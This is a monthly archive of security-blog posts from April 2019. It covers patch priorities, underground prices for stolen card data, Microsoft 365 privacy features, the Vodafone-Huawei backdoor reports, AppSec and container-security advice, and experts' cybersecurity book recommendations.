Monthly Archives: April 2019

Tripwire Patch Priority Index for April 2019

Tripwire’s April 2019 Patch Priority Index (PPI) brings together important vulnerabilities from Microsoft, Adobe, and Oracle. First on the patch priority list this month are patches for Microsoft’s Browser and Scripting Engine. These patches resolve 13 vulnerabilities, including fixes for Memory Corruption, Browser Tampering, and Information Disclosure vulnerabilities. Next on the list are patches for […]… Read More

The post Tripwire Patch Priority Index for April 2019 appeared first on The State of Security.

Data: E-Retail Hacks More Lucrative Than Ever

For many years and until quite recently, credit card data stolen from online merchants has been worth far less in the cybercrime underground than cards pilfered from hacked brick-and-mortar stores. But new data suggests that over the past year, the economics of supply-and-demand have helped to double the average price fetched by card-not-present data, meaning cybercrooks now have far more incentive than ever to target e-commerce stores.

Traditionally, the average price for card data nabbed from online retailers — referred to in the underground as “CVVs” — has ranged somewhere between $2 and $8 per account. CVVs are are almost exclusively purchased by criminals looking to make unauthorized purchases at online stores, a form of thievery known as “card not present” fraud.

In contrast, the value of “dumps” — hacker slang for card data swiped from compromised retail stores, hotels and restaurants with the help of malware installed on point-of-sale systems — has long hovered around $15-$20 per card. Dumps allow street thieves to create physical clones of debit and credit cards, which are then used to perpetrate so-called “card present” fraud at brick and mortar stores.

But according to Gemini Advisory, a New York-based company that works with financial institutions to monitor dozens of underground markets trafficking in both types of data, over the past year the demand for CVVs has far outstripped supply, bringing prices for both CVVs and dumps roughly in line with each other.

Median price of card not present (CNP) vs. card-present (CP) over the past year. Image: Gemini

Stas Alforov, director of research and development at Gemini, says his company is currently monitoring most underground stores that peddle stolen card data — including such heavy hitters as Joker’s Stash, Trump’s Dumps, and BriansDump.

Contrary to popular belief, when these shops sell a CVV or dump, that record is then removed from the inventory of items for sale, allowing companies that track such activity to determine roughly how many new cards are put up for sale and how many have sold. Underground markets that do otherwise quickly earn a reputation among criminals for selling unreliable card data and are soon forced out of business.

“We can see in pretty much real-time what’s being sold and which marketplaces are the most active or have the highest number of records and where the bad guys shop the most,” Alforov said. “The biggest trend we’ve seen recently is there appears to be a much greater demand than there is supply of card not present data being uploaded to these markets.”

Alforov said dumps are still way ahead in terms of the overall number of compromised records for sale. For example, over the past year Gemini has seen some 66 million new dumps show up on underground markets, and roughly half as many CVVs.

“The demand for card not present data remains strong while the supply is not as great as the bad guys need it to be, which means prices have been steadily going up,” Alforov said. “A lot of the bad guys who used to do card present fraud are now shifting to card-not-present fraud.”

One likely reason for that shift is the United States is the last of the G20 nations to make the transition to more secure chip-based payment cards, which is slowly making it more difficult and expensive for thieves to turn dumps into cold hard cash. This same increase in card-not-present fraud has occurred in virtually every other country that long ago made the chip card transition, including AustraliaCanadaFrance and the United Kingdom.

The increasing value of CVV data may help explain why we’ve seen such a huge uptick over the past year in e-commerce sites getting hacked. In a typical online retailer intrusion, the attackers will use vulnerabilities in content management systems, shopping cart software, or third-party hosted scripts to upload malicious code that snarfs customer payment details directly from the site before it can be encrypted and sent to card processors.

Research released last year by Thales eSecurity found that 50 percent of all medium and large online retailers it surveyed acknowledged they’d been hacked. That figure was more than two and a half times higher than a year earlier.

BIG BANG VS. LOW-AND-SLOW

Much of the media’s attention has been focused on recent hacks against larger online retailers, such those at the Web sites of British Airways, Ticketmaster, and electronics giant NewEgg. But these incidents tend to overshadow a great number of “low-and-slow” compromises at much smaller online retailers — which often take far longer to realize they’ve been hacked.

For example, in March 2019 an analysis of Gemini’s data strongly suggested that criminals had compromised Ticketstorm.com, an Oklahoma-based business that sells tickets to a range of sporting events and concerts. Going back many months through its data, Gemini determined that the site has likely been hacked for more than two years — allowing intruders to extract around 4,000 CVVs from the site’s customers each month, and approximately 35,000 accounts in total since February 2017.

Ticketstorm.com did not respond to requests for comment, but an individual at the company who answered a call from KrebsOnSecurity confirmed Ticketstorm had recently heard from Gemini and from card fraud investigators with the U.S. Secret Service.

“It’s not just large sites getting popped, it’s mostly small to mid-sized organizations that are being compromised for long periods of time,” Alforov said. “Ticketstorm is just one of ten or twenty different breaches we’ve seen where the fraudsters sell what they collected and then come back and collect more over several years.”

In some ways, CVVs are more versatile for fraudsters than dumps. That’s because about 90 percent of dumps for sale in the underground do not come with other consumer data points needed to complete a various online transactions — such as the cardholder’s name or billing address, Gemini found.

This is particularly true when CVV data is collected or amended by phishing sites, which often ask unwitting consumers to give up other personal information that can aid in identity theft and new account fraud — including Social Security number, date of birth and mother’s maiden name.

All of which means e-commerce retailers need to be stepping up their game when it comes to staving off card thieves. This in-depth report from Trustwave contains a number of useful suggestions that sites can consider for a defense-in-depth approach to combating an increasingly crowded field of criminal groups turning more of their attention toward stealing CVV data.

“There is a lot more incentive now than ever before for thieves to compromise e-commerce sites,” Alforov said.

Updates for Microsoft 365 help strengthen data privacy

As data continues to grow exponentially and travel across organizational boundaries, privacy and compliance professionals play an increasingly strategic role within organizations. Several updates—announced today—for Microsoft 365 provide organizations with more control and options to strengthen their data privacy practices, including:

  • New capabilities for Microsoft 365 E5 and E5 Compliance, such as the new Office 365 Advanced Message Encryption feature, data investigation capabilities, Microsoft Teams compliance features, and a new Advanced eDiscovery experience.
  • The ability to use Compliance Manager to get automated updates of security controls and create your own assessments—including on-premises and non-Microsoft applications—against any regulation or standard, so you can manage compliance across data assets in a unified way.

To learn more about these updates, read Grow and protect your business with more privacy controls from Microsoft 365.

The post Updates for Microsoft 365 help strengthen data privacy appeared first on Microsoft Security.

Test Your Knowledge on Cloud Adoption and Risks

Our data lives in the cloud, and nearly a quarter of it requires protection to limit our risk. You won’t be able to get far in your transformation to the cloud without learning the sources of cloud data risk and how to circumnavigate them.

In our latest Cloud Adoption and Risk Report, we analyze the types of sensitive data in the cloud and how it’s shared, examine IaaS security and adoption trends, and review common threats in the cloud. Test your knowledge on the latest cloud trends and see if your enterprise understands the basics of cloud-related risks.

Not prepared? Lucky for you this is an “open-book” test. Find some cheat sheets and study guides below.

Report: Cloud Adoption and Risk Report 2019

Blog: Cloud Security Risks – It’s not black and white

MVISION Cloud Data Sheet

MVISION Cloud

Note: There is a widget embedded within this post, please visit the site to participate in this post's widget.

The post Test Your Knowledge on Cloud Adoption and Risks appeared first on McAfee Blogs.

Behind the Screens: An Interview with Trystan Orr

Trystan OrrCybersecurity is best approached holistically—by combining human, physical, and technical efforts together to mitigate threats. But how exactly does the human element play a role?  To grasp just how humans and psychology are central to the cybersecurity industry, we spoke to our very own Security Operations Center Analyst, Trystan Orr.

Q:  How did you first become interested in cybersecurity?

A:  I’ve been interested in technology since I was very young—I was introduced to computers and video games early.  But there was no particular turning point that got me into cybersecurity; it was more of a slow realization.  I took a couple of coding courses in high school and really liked them.  Then, in college, I took a security class and received my Security+ certification.  I really enjoyed just how pervasive security is: in anything you do, you have to consider security.

“At the same time, I started to notice a strong correlation between psychology and security. It’s about the way humans interact with the technology, and that’s why cybersecurity hit a note with me.  Humans can be your greatest risk- and your greatest strength.”

Q:  How do you apply your understanding of psychology to your job as a security analyst?

A:  One of the key parts of my job as an analyst is thinking of the business need that accompanies security initiatives.  For example, when a security alert is triggered, you have to think about the people behind the screens that triggered the alert.  This is where psychology comes in.  Once you have an understanding of who they are and what they’re doing in their day-to-day, you can respond to the alert.  You don’t want to suggest something that slows down the business, or stops the user from doing what they need to do.

Understanding the user, the human, allows us to offer these custom solutions.

Q:  Looking ahead a few years, what do you predict will be the next big change in the industry?

A:  Awareness.  I think people are becoming more aware of security, which is exciting to see.  For instance, users are becoming more aware of phishing and the importance of reporting potential phishing emails.

“I think part of this increased awareness is a shift from thinking of cybersecurity as a purely technological problem, to a human problem as well.  Users are starting to see the role they play in cybersecurity.” 

Q:  What do you see as the value of encouraging women to enter the industry?

A:  I think including more women in the industry brings different viewpoints that are valuable in discussion and problem-solving. It’s becoming much more apparent that you have to have different people and different personalities to be effective. If you have a different viewpoint, you also have different experiences backing up that viewpoint.

This is especially important in security; you have to be able to have open discussions about how certain security measures affect the user’s risk and productivity.  The goal is to understand what’s best for the user in order to offer the best solution.  This is best achieved when a variety of different viewpoints are brought to the table.

Q:  What advice do you have for anyone interested in entering the cybersecurity industry?

A:  When I first started in the industry as an intern, I didn’t have a security background.  I understood what was going on, but there was a lot I didn’t know. I realized that you must be completely unafraid to ask questions—before you start a new job or internship, and then throughout the entire time you’re there.

There’s a lot you can learn on your own too.  If you are even a little interested, you don’t have to pay loads of money to learn more about the industry.  Always be motivated and open to new ways you can learn.

To hear from more inspiring women in cybersecurity, check out our series.

The post Behind the Screens: An Interview with Trystan Orr appeared first on GRA Quantum.

Learning From the Vodafone-Huawei Backdoor Scandal

Veracode Vodafone Huawei Backdoor April 2019

Yesterday, Bloomberg reported that Vodafone uncovered hidden backdoors in Huawei equipment used for the carrier’s Italian business, which could have given Huawei unauthorized access to Italian homes and businesses. The alleged backdoors were found in 2011 and 2012, and Vodafone told Bloomberg that the issues were resolved at the time.

However, the BBC published a piece this morning in which Vodafone denied the Bloomberg report, citing a spokesperson who says that, "The 'backdoor' that Bloomberg refers to is Telnet, which is a protocol that is commonly used by many vendors in the industry for performing diagnostic functions. It would not have been accessible from the internet.”

Further, the spokesperson indicated that Bloomberg was incorrect in saying that Huawei could have had unauthorized access to the carrier’s Italian network, nor does Vodafone have evidence of any unauthorized access.

According to the BBC, Vodafone took some time off of deploying Huawei equipment in its core networks until a few issues are resolved – namely that Huawei has been accused of being controlled by the Chinese government, which could pose a security risk. The US encouraged allies not to use the equipment in 5G networks, with Secretary of State Mike Pompeo saying the U.S. wouldn't be able to work with nations using the Chinese technology.

What’s the Deal with Backdoors?

Backdoors are a method of bypassing authentication or other security controls in order to access a computer system or the data contained on that system. They can exist at the system level, in a cryptographic algorithm, or within an application. Some backdoors are included in software intentionally, however, they can still pose a serious threat if uncovered by the wrong people.

According a paper from Veracode CTO Chris Wysopal and Veracode Chief Research Officer Chris Eng, backdoored software enables attackers to gain access to highly secure systems that are otherwise rigorously locked down and monitored. The network traffic to and from an application backdoor will most often look like typical usage of the networked application.

For instance, the network traffic of an attacker using backdoored blog software will look like the typical web traffic of a blog user. This will enable them to bypass any network IDS protection. Since the backdoored software is installed by the system operator and is legitimate software it will typically bypass anti-virus software protection.

Many attackers will place backdoors in the source code of software that they have legitimate access to simply because it is a challenge and because they can. They have no intention initially of compromising systems where the software will be installed but take the opportunity because they may want to use the backdoor in the future.

Companies like Apple have forsaken backdoors, and has gone as far as to create their hardware without third-party access to ensure an acceptable level of protection for users and their personal information.

Curious to find out if you have backdoors in your code? Get in touch so we can help.

Your AppSec Program Can Make Your Developers and Your CFO Happy

Veracode AppSec Developers CFO Dynamic Analysis

While cybersecurity risk is steadily growing, so too is the recognition that application security (AppSec) is critical to protecting valuable enterprise resources. More than ever, ensuring that you have a program that spans the entire SDLC is critical to preventing breaches into your organization and customer data. Just as it is important to inventory and secure all of the applications in your portfolio, it’s equally important that your applications are coded securely. Let’s be real: there are a few ways that shifting your application security program left can go wrong. This can include purchasing solutions that don’t really fit the needs of your organization, failing to determine what flaws need fixing first in order to avoid breach, and measuring success against the wrong metrics. This can cost you valuable resources, including your developers’ time and energy, your clients’ trust – and incite the ire of your organization’s CFO.

Here are three tips for running a developer-friendly AppSec program that saves your organization’s most precious resources.

Create Strong Application Security Policies

You know how you treat each email you receive with varying levels of attention and detail? The same sort of policies should be implemented when it comes to fixing flaws found in your software. Like any tool or methodology, AppSec requires a strong structural framework to deliver maximum results. A broadly defined and unfocused program, and the absence of strong AppSec policies, can lead to teams chasing down every flaw and fix. Essentially, you’re running the risk of overwhelming your developers who will no longer have the time or energy to take threats seriously.

There is no one-size-fits-all framework when it comes to creating application security policy (here’s a guide to get you started). It’s really a matter of setting the bar at the right risk and protection level, determining which flaws really matter, understanding remediation and mitigation, and keeping an eye on third-party applications and open source components. Focusing on AppSec standards, like OWASP Top 10, and balancing the needs of your organization will position you for maximum performance and protection, and help you avoid developer burnout.

Identify Appropriate Metrics

The right set of metrics and key performance indicators (KPIs) can greatly simplify and streamline both your software development and your application security. There are a few other metrics to consider beyond meeting your organization’s policy requirements. For example, organizations that have adopted Agile and DevSecOps will find themselves scanning applications and code more frequently. This kind of scanning, when done through automated integration with development systems and at the times best aligned for the development team, can limit the number of vulnerabilities introduced in the Testing and Production stages. Ensuring scan frequency also means reduced mean time to remediate (MTTR) – Veracode’s State of Software Security Volume 9 found that development teams who scanned 300 or more times per year are fixing flaws 11.5x faster than other organizations.

Another metric to consider is flaw density. Flaw density provides a way of looking at the number of flaws produced from a static analysis over the size of the application and can provide directional guidance when comparing groups of applications. A high flaw density simply means more flaws to address, allowing the opportunity to determine where best to use AppSec resources and prioritize flaws accordingly. The beauty of implementing a developer-friendly AppSec program is that it decreases flaw density over time. The Total Economic ImpactTM of the Veracode Application Security Platform, a Forrester Consulting study, shows that prior to using Veracode, the composite organization experienced 60 flaws per MB of code. After adopting the Veracode platform and integrating tools into their CI/CD pipeline, the composite saw a reduction in security flaws of 50% to 90% over three years.

Ensuring that your team has access to actionable results from all application security testing scans performed in a single platform makes coordinating remediation between security, development, and other IT teams easier and more efficient. It also simplifies your ability to measure against the metrics and KPIs set for your organization. To learn more about how to measure your AppSec program, check out the Everything You Need to Know About Measuring Your AppSec Program guide.

Select the Right Solutions

When it comes to AppSec, you need a combination of solutions to ensure that you’re securing your applications at every stage – that’s right, there’s still no silver bullet in security. In the Forrester Consulting study, the organizations interviewed used the Veracode Platform to build stringent security controls and integrate application security testing into their CI/CD pipeline. In addition to using Veracode Static Analysis and Veracode Dynamic Analysis, these organizations shifted security left using Veracode Greenlight and Veracode Software Composition Analysis to identify issues at inception in the SDLC.

As a result, they found that developers were introducing fewer flaws to their code and that the flaws they did find took less time to resolve because we are able to offer contextual remediation advice for those security flaws. Since security flaws were caught earlier in the SDLC, the organization saw a 90 percent reduction in time required to resolve these flaws. Resolutions which previously took 2.5 hours on average were reduced to 15 minutes.

With MTTR included in your overall metrics, it’s important that your application security solutions are designed for speed AND a low false positive rate. This means that security and development teams will spend less time sorting through results to find actual vulnerabilities, and spend more time fixing what matters so that they can move on to other projects.

Developing an AppSec Road Map Saves Time and Money

Organizations need to conduct security testing at the speed of modern day software development in order to maintain tight product roadmap deadlines and increase speed to market. When your teams take the time to understand the bigger picture, the solutions that they need to get the job done well and done efficiently, and they’re able to save time and money doing it, everybody wins. Your development teams will have the space to make your next standout product or feature. You will have the resources to invest in furthering their development education. Your applications will be more secure and your entire organization will be the better for it.

The Next Enterprise Challenge: How Best to Secure Containers and Monolithic Apps Together, Company-wide

Submitted by: Adam Boyle, Head of Product Management, Hybrid Cloud Security, Trend Micro

When it comes to software container security, it’s important for enterprises to look at the big picture, taking into account how they see containers affecting their larger security requirements and future DevOps needs. Good practices can help security teams build a strategy that allows them to mitigate pipeline and runtime data breaches and threats without impacting the agility and speed of application DevOps teams.

Security and IT professionals need to address security gaps across agile and fast pace DevOps teams but are challenged by decentralized organizational structures and processes. And since workloads and environments are constantly changing, there’s no silver bullet when it comes to cybersecurity, there’s only the info we have right now. To help address the current security landscape, and where containers fit in, we need to ask ourselves a few key insightful questions.

How have environments for workloads changed and what are development teams focused on today? (i.e. VMs to cloud to serverless > DevOps, microservices, measured on delivery and uptime).

Many years ago, the customer conversations that we were having were primarily around cloud migration of traditional, legacy workloads from the data center to the cloud. While performing this “forklift,” they had to figure out what IT tools, including security, would operate naturally in the cloud. Many traditional tools they had already purchased previously, before the cloud migration, didn’t quite work out when expanded to the cloud, as they weren’t designed with the cloud in mind.

In the last few years, those same customers who migrated workloads to the cloud, started new projects and applications using cloud native services, and building these new capabilities on Docker, and serverless technologies such as AWS Lambda, Azure functions, and Google Cloud functions. These technologies have enabled teams to adopt DevOps practices where they can essentially continuously deliver “parts” of applications independently of one and other, ultimately delivering outcome much faster to market than one would with a monolithic application. The new projects have given birth to CI/CD pipelines leveraging Git for source code management (using hosted versions from either GitHub or BitBucket), Jenkins, or Bamboo for DevOps automation, and Kubernetes for automated deployment, scaling, and management of containers.

Both of these thrusts are now happening in parallel driving two distinct classes of applications—legacy, monolithic applications, and cloud native microservices. The questions for an enterprise are simple; how do I protect all of this? And, how can I do this at scale?

What’s worth mentioning is also the maturity of IT and how these teams have evolved into leveraging “infrastructure as code.” That is, writing code to automate IT operations. This includes security as code or writing code to automate security. Cloud operations teams have embraced automation and have partnered with application teams to help scale the automation of DevOps driven applications while meeting IT requirements. Technologies like Chef, Puppet, Ansible, Terraform, and Saltstack are popular in our customer base when automating IT operations.

While vulnerabilities and threats will always persist, what is the bigger impact on the organization when it comes to DevOps teams and security?

What we hear when companies talk to us is that the enterprise is not designed to do security at scale for a large set of DevOps teams who are continuously doing build->ship->run and need continuous and uninterrupted protection.

A typical enterprise has a centralized IT and Security Ops teams who are serving many groups of internal customers, typically business units which are responsible for generating the revenue for the enterprise.

So, how do tens or hundreds of DevOps teams who continuously build->ship->run, interact with centralized IT and security Ops teams, at scale? How do IT and security Ops teams embrace these practices and technologies, and ensure that they are secure—both the CI/CD pipelines and the runtime environments?

These relationships between IT teams (including security teams), and the business units have largely been at an executive level (VP and up), but to deliver “secure” outcomes continuously—a more effective, a more automated interplay—between these teams are needed.

We see many DevOps teams across business units incorporating security with varying degrees of rigor—or buying their own security solutions that only work for their set of projects—purchased out of their business unit budgets, implementing them with limited security experience and no tie-back to corporate security requirements or IT awareness. This leads to a fragmented, duplicated, complicated, inconsistent security posture across the enterprise and higher cost models on security tools that becomes more complicated to manage and support. The pressure to deliver faster within a business unit is sometimes at the cost of a coordinated enterprise-wide security plan…we’ve all been there and there’s often a balance that needs to be found.

The relationship, at the working level, between business unit application teams and centralized IT and security Ops teams is not always a collaborative, healthy, working relationship. Sometimes it has friction. Sometimes, the root cause of this friction can be related to application teams having significantly higher understanding of DevOps practices, tools, along with higher understanding of technologies, such as Docker, Kubernetes, and various serverless technologies, than their IT counterparts. We’ve seen painful, unproductive discussions between application teams trying to educate their IT/Security teams on the basics, let alone, get them on board with doing things differently. The friction increases if the IT and security Ops teams don’t embrace the changes in their approach when it comes to container and serverless security. So, to us, the biggest impact right now is if a DevOps team wants to deliver continuously while following an enterprise-wide approach, then they need a continuous relationship with the IT and security operations teams, whom must become well educated in DevOps practices and tools, and microservices technologies (Docker, Kubernetes, etc), where the teams work together to automate security across pipelines and runtime environments. And, the IT and security teams need to level up their skills sets to DevOps and all associated technologies, and help teams move faster, not slower, while meeting security requirements.

To be true DevOps, the “Dev” part would be the application team, the “Ops” part would be ideally IT/security and they would work together. So, we think there could be some pretty big shifts on how enterprises organize their development teams and IT/security Ops teams as the traditional organizational models favor delivery of monolithic, legacy applications that do not do continuous delivery.

The biggest opportunity for IT/security Ops teams is engage the application teams with a set of self-service tools and practices that are positioned to help the teams move faster, while meeting the IT and security requirements for the enterprise.

How can DevOps teams take advantage of the best security measures to better protect emerging technologies like container environments and their supporting tools?

Well this could easily be a book! However, let’s try to summarize at a high level and break this down into “build,” “ship,” and “run.” By no means is this a complete list, but enough to get started. For more information, contact us

Security teams have fantastic opportunity to introduce the following services across the enterprise, for all teams with pipelines and runtimes, in a consistent way.

Build

  • Identification of all source code repositories and CI/CD pipelines across the enterprise, and their owners.
  • Static code analysis.
  • Image scanning for malware.
  • Image scanning for vulnerabilities.
  • Image scanning for configuration assessments (ensure images are hardened).
  • Indicator of Compromise (IoC) queries across all registries.
  • Secrets detection.
  • Automated security testing in staged environments, with generic and custom test suites.
  • Image Assertion – declaring an image to be suitable for the next stage of the lifecycle based on the results of scans, tests, etc.
  • Provide reporting to both application teams and security teams on security scorecards.

Ship

  • Admission control – the allowance or blocking of images to runtime environments based on security policies, image assertion, and/or signed images.
  • Vulnerability shielding of containers – Trend Micro will be releasing this capability later this year.

Run

  • Runtime protection of Docker and Kubernetes, including anomaly detection of abnormal changes or configurations.
  • Hardening of Kubernetes and Docker.
  • Using Kubernetes network policy capabilities for micro-segmentation, and not a third-party solution. Then, ensure Kubernetes is itself protected.
  • Container host-based protection—covering malware, vulnerabilities, application control, integrity monitoring, and log inspection—for full stack defense of the applications and the host itself.
  • Kubernetes pod-based protection (privileged container – one per pod). This can be shipped into Kubernetes environments just like any other container, and no host-based agent is required.

For serverless containers and serverless, application protection in every image or serverless function (AppSec library focusing on RASP, OWASP, malware, and vulnerabilities inside the application execution path). Trend Micro will be releasing an offer later this year to address this.

Trend Micro provides a stronger and more robust full lifecycle approach to container security. This approach helps application teams meet compliance and IT security requirements for continuous delivery in CI/CD pipelines and runtime environments. With multiple security capabilities, complete automation resources, and world class threat intelligence research teams, Trend Micro is a leader in the cybersecurity needs of today’s application and container driven organizations.

Learn more at www.trendmicro.com/containers.

The post The Next Enterprise Challenge: How Best to Secure Containers and Monolithic Apps Together, Company-wide appeared first on .

The best cyber security books out there, chosen by over 20 experts

Books are the best way to go about learning in-depth knowledge, and this applies to cybersecurity as well. To this end, we’ve decided to approach these 21  experts about what are the best educational cyber security books out there.

Of course, we know there is no such thing, and each book is good in its own way. The endgame is to create a go-to resource of curated books you, as a user, can read to take your online security knowledge to the next level.

The experts we’ve included in this roundup are leading figures in the industry, and are frequently the first ones to learn about a new kind of malware or cyber threat.

To help you better navigate the list, we’ve internal links so you can zip along from one expert’s recommendation to another.

Inbar Raz | Twitter | Principal researcher at PerimeterX

Inbar’s choice is “ A Bug Hunter’s Diary ”, by Tobias Klein. In a few words, Inbar summarizes the highlights of the book, and also a caveat:

I really liked it because the author did a great job at taking something that is technically sophisticated and hard, and socially admired [bug hunting, vulnerability exploitation]  – and making it accessible and understandable. I think that people who want to understand what vulnerability research is, without having to learn to do it themselves, will find it the perfect book for them. The caveat, though, is that you have to be able to read programming languages in order to fully understand the gravity of what he does.

A book for the technically minded user, who doesn’t mind delving into code to understand cyber threats.

Pierluigi Paganini | Twitter | Founder at Security Affairs

The book of choice for him is The Art of Deception by Kevin Mitnick.

It is a must read, the book explains the importance of social engineering in any attack.

The book shows that human is the weakest link in the cyber security chain, and the art of social engineering allows to exploit it. The book includes real stories and social engineering cases and demonstrates how to chain them in real hacking scenarios.

The reading of the book is suggested also to not tech-savvy people, it can teach them how to avoid being a potential victim of attacks.

Alexandru Stoian | Cybersecurity researcher for the Romanian CERT

His list of recommended book are technical in nature and written for a technically-savvy person who wants to dive into the intricacies of cybersecurity.

Lawrence Abrams | Founder and chief editor of Bleeping Computer | Twitter

Practical Malware Analysis by Michael Sikorksi and Andrew Honig is a frequently cited book in this roundup, and for good reason. It’s a go-to guide for many in learning both basic and advanced malware analysis and dissection techniques.

Understanding Cryptography by Christof Paar and Jan Pelzl is book oriented towards more advanced readers who want to improve their education in the technical basics of cryptography.

Claus Houmann | Twitter | Community manager at Peerlyst

His recommendations aren’t one book, but instead a treasury of free cyber security books that cover the most important aspects of the niche. You can find books for just about any level, from cybersecurity beginner who wants to learn the ropes, to advanced users who want to improve their technical expertise.

Here’s the  full list of free books which includes titles such as Car hackers Handbook and Reverse Engineering for Beginners.

He also recommended three useful ebooks written in collaboration by members of Peerlyst’s community of information security experts. The first one is The Beginner’s guide to Information Security , the second ebook is on the Essentials of Cybersecurity, while the third one talks about the Essentials of Enterprise Network Security.

Alexandre Campos | Profile page | Professor and IT Security team member

Here’s his answer when asked what is the best educational cyber security books out there:

There are lots of books I could mention here but since you ask me for only one, I can’t let aside “ Hacking Exposed 7 “, by Stuart McClure, Joel Scambray and George Kurtz. These security experts show us, in a nice way, how to understand what hackers do during an attack and how to protect us from their actions. They show us concepts and how they can be applied in practice, also telling us about several countermeasures against a wide variety of tools avaiable for hackers to use. It worths it each page you read.

Thomas Callahan | Cybrary

Thomas hails from Cybrary, an online library of courses in various subfields of cybersecurity, such as penetration testing, or malware analysis.

In no particular order, these are his recommended list of cyber security books:

General knowledge and awareness:

Practical guides:

Adam Shostack, author of Threat Modeling | Blog Profile

“I’m going to say that Steven Bellovin’s “ Thinking Security ” is my favorite antidote to jumping to conclusions.  Recently, I’ve seen lots of extreme responses to both the Intel management issue and the Windows Defender script engine.  Both are bad, but jumping to “you will be working the weekend” doesn’t help.  Bellovin’s book will.”

Dave Waterson | Personal Blog |CEO and founder of SentryBay

His recommended cybersecurity book is  Countdown to Zero Day by Kim Zetter. It’s accessible to users without a technical background, and goes over the destructive power of Stuxnet, the malware responsible for sabotaging Iranian centrifuges used in their nuclear program.

Ilya Kolmanovich | Twitter | IBM

Ilya is cybersec Threat Engineer and is part of IBMs Security Intelligence team.

His book of choice when it comes to cybersecurity education is  Practical Malware Analysis by Michael Sikorski.

Joe Shenouda | LinkedIn | Principal Cyber Analyst at Verizon

The three books that he recommends are:

  1.    Cyber War: The Next Threat to National Security and What to Do About It – Richard Clarke, Robert Knake
  2.    Cyberspies: The Secret History of Surveillance, Hacking, and Digital Espionage By Gordon Corera
  1.    Cybersecurity and human rights in the age of cyberveillance , edited by Joanna Klesza & Roy Balleste

Martijn Grooten | Editor of Virus Bulletin | Twitter

“My favourite book on cybersecurity is  Countdown To Zero Day , by Kim Zetter.

If it is specifically about educational cybersecurity books, my favourite would be Bulletproof SSL and TLS , by Ivan Ristic.”

Troy Hunt | Personal Blog |Creator of HaveIBeenPwned.com

We Are Anonymous by Parmy Olson offers in inside view into the worksings of shadowy hacking groups such as Lulz Sec, Anonymous and the Global Cyber Insurgency.

Xavier Mertens | Personal Blog | Handler for the ISC Initiative

His go to book is  Practical Malware Analysis . It’s safe to say that this book has fairly widespread endorsement by now.

Raj Samani | Computer Security Expert and Chief Scientist at  McAfee

The Cuckoo’s Egg by Cliff Stoll details the story of how the author managed to discover a computer espionage ring infiltrated in the Lawrence Berkeley Lab. The operation eventually led to the involvement of the CIA, and exposed the role of the KGB in the entire operation. 

Liviu Arsene | Twitter | Senior E-Threat Analyst at Bitdefender

His recommended book is Ghost in the Wires , a biography of Kevin Mitnick, a malicious hacker who broke into numerous companies, such as Motorola and Sun Microsystem, all while ducking and dodging the FBI.

Pavel Pohorelsky | Twitter | CTO at Lamantine

Future Crimes by Marc Goodman is a New York Times best seller, which dives into the underground world of blackhat hackers, and explores their motivations, methods and purposes, as viewed by a man working in law enforcement on a mission to stop them.

John E. Dunn | Twitter | Editor and Co-founder at Techworld

Move Fast and Break Things by Jonathan Taplin is an exploration of how the Internet started to change in the vision of the world greatest technology entrepreneurs such as Mark Zuckerber and Larry Page.

David Bisson | Twitter | Security Journalist and Associate Editor at Tripwire | Contributing Editor for Graham Cluley Security News

Worm by Mark Bowden traces the history of the Conficker worm, one of the first major threats against the Internet, and which put into perspective how important online security would be in the new technological world.

Spam Nation by Brian Krebs explores the world of spam, unmasking criminal groups responsible for flooding the email inboxes of tens of millions of users with scam offers, malware and ransomware.

Madalin Dogaru | Security Consultant at SentientChip

If you want to learn how to (ethically!) hack a computer, you’re going to need to know Python, and Black Hat Python by Justin Seitz teaches you the most important aspects.

Reversing: Secrets of Reverse Engineering by Eldad Eilam breaks down the processes required to reverse engineer software and computer internals.

Rtfm: Red Team Field Manual by Ben Clark contains all of the most important basic syntax in Windows and Linux command lines. Useful when Google doesn’t seem to be able to handle your search query.

Linux Shell Scripting Cookbook is a useful resource in learning how to use simple commands for complex tasks in the Linux shell.

Peter Kruse | Twitter | eCrime Specialist at CSIS Security

Countdown to Zero Day by Kim Zetter. By now, this is the third endorsement of this book, and highlights its quality,

Daniel Cid | Profile page | Founder/CTO of Sucuri, Inc

Stealing the Network: How to Own a Continent details how major hackings are accomplished from a technical point of view. A more interesting take on this book comes from review Amar Pai:

This is basically a Tom Clancy novel, but with PHP exploits, nmap console logs, IDA debugger sessions, and other info-sec-porn in place of the usual war-nerdy stats about submarines, missile launchers, Apache gunships, etc.

David Harley | Twitter | Anti-malware researcher and author

Since ‘true’ computer viruses occupy only a tiny corner of the current malware threatscape, it may seem strange to refer back to a groundbreaking book on viruses from 1990, but I really have to mention Dr. Frederick B. Cohen’s book ‘A Short Course on Computer Viruses ’. Not just because Cohen literally ‘wrote the book’ on viruses and is therefore a significant historical figure. Not  just because of what it tells us about the threat as it was seen at that time, though as a fairly abstract overview it does have interest. (If you want exhaustive discussion of specific historical malware, I have a few suggestions below.) But because if you absorb his analyses of technical defenses, you will be in a position to make certain vendors uncomfortable by asking questions about their magic algorithms.

Wearing my security manager’s hat (well, I would, but I haven’t occupied that particular vocational niche for many years, so I don’t have one), I also found Cohen’s ‘Protection and Security on the Information Superhighway ’ a useful resource (especially as a source of useful citations), if less groundbreaking.

There are, of course, many books intended for the edification of security managers, not all of which are terribly good. It might be a bit naughty to mention a book of which I was lead author and technical editor, but I really do think that the ‘AVIEN Malware Defense Guide for the Enterprise ’ (Syngress), though it too suffers from obsolescent technical assumptions, is still worth a look in that it offers a (probably unique) selection of chapters contributed by enterprise security professionals, security vendors, and researchers.

Long before I ever met Stephen Cobb, now a friend and colleague at ESET, one of my go-to resources for management-oriented information was his book ‘ The NCSA Guide to PC and LAN Security ’ (McGraw-Hill). That book was actually based on an earlier book, ‘Cobb’s Guide to PC and LAN Security’ which is available for download from Stephen’s blog at https://scobbs.blogspot.co.uk/ and as he says himself, ‘A lot of what I wrote about privacy principles is still relevant.’

I don’t claim to have more than the basic knowledge of cryptology, but if I needed to dig a little bit deeper, my first port of call would still be Bruce Schneier’s ‘Applied Cryptography: Protocols, Algorithms and Source Code in C ’ (Wiley), even though the 2nd edition goes back to 1996. However, ‘Cryptography Engineering: Design Principles and Practical Applications ’ (Wiley: by Niels Ferguson, Schneier, and Tadayoshi Kohno) and is much more recent, though I’m afraid I haven’t got around to reading it yet. For a more historical, less technical consideration, Simon Singh’s ‘The Code Book ’ (Doubleday) is a pleasant enough read.

